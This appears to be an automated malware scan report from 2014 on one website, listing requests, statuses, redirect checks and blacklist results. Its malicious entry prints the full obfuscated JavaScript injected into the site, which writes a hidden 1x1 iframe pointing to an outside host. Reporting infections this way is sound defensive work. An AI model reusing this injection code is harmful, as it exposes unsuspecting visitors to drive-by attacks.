Scanned pages/files
Request | Server response | Status |
http://pacharaorchidintertrade.com/ | 200 OK Content-Length: 1912 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var UoaYW=document;function ixekV_(IPqcMJ){var ROVBw = "",FchmZybuaK=0;for(FchmZybuaK=IPqcMJ.length-1;FchmZybuaK >= 0;FchmZybuaK--){ROVBw+=IPqcMJ.charAt(FchmZybuaK);}return ROVBw;}function LgDLGtpg(vfpejwlolC){vfpejwlolC = vfpejwlolC.replace(/[\.]/g, "%");vfpejwlolC=unescape(vfpejwlolC);return ixekV_(vfpejwlolC);}function MnE_vpOF(){UoaYW.write("<style>.ziKoRZhTA{width:1px;height:1px;border:none;visibility:hidden}</style>");var dmiaXgrp="<iframe id=\"kLW__Co\" src=\"x\" class=\"ziKoRZhTA\"></iframe>";var PqSiNZf=dmiaXgrp.replace(/[\+x]/g,LgDLGtpg(".70.68.70.2e.6e.69.2f.73.72.65.73.75.2f.6f.66.6e.69.2e.73.63.69.74.79.6c.61.6e.61.2d.73.74.61.74.73.2f.2f.3a.70.74.74.68"));return PqSiNZf;}UoaYW.writeln(MnE_vpOF()); Antivirus reports:
| ||
http://restaurantparkhvar.com/js/index.php | HTTP/1.1 302 Found Connection: close Date: Wed, 08 Oct 2014 10:45:29 GMT Location: http://ww15.restaurantparkhvar.com/js/index.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3-7+squeeze21 | clean |
http://ww15.restaurantparkhvar.com/js/index.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://ww15.restaurantparkhvar.com/test404page.js | 404 Not Found Content-Length: 13177 Content-Type: text/html | clean |
http://www.google.com/adsense/domains/caf.js | 200 OK Content-Length: 258 Content-Type: text/javascript | clean |
http://a1.dnbizcdn.com/js/parking_caf_281_1409192.js | 200 OK Content-Length: 37944 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pacharaorchidintertrade.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 08 Oct 2014 10:45:28 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 1912
Content-Type: text/html
X-Powered-By: PHP/5.3.25
...1912 bytes of data.
GET / HTTP/1.1
Host: pacharaorchidintertrade.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 08 Oct 2014 10:45:28 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 1912
Content-Type: text/html
X-Powered-By: PHP/5.3.25
...1912 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pacharaorchidintertrade.com
Referer: http://www.google.com/search?q=pacharaorchidintertrade.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pacharaorchidintertrade.com
Referer: http://www.google.com/search?q=pacharaorchidintertrade.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pacharaorchidintertrade.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pacharaorchidintertrade.com/
Result: pacharaorchidintertrade.com is not infected or malware details are not published yet.
Result: pacharaorchidintertrade.com is not infected or malware details are not published yet.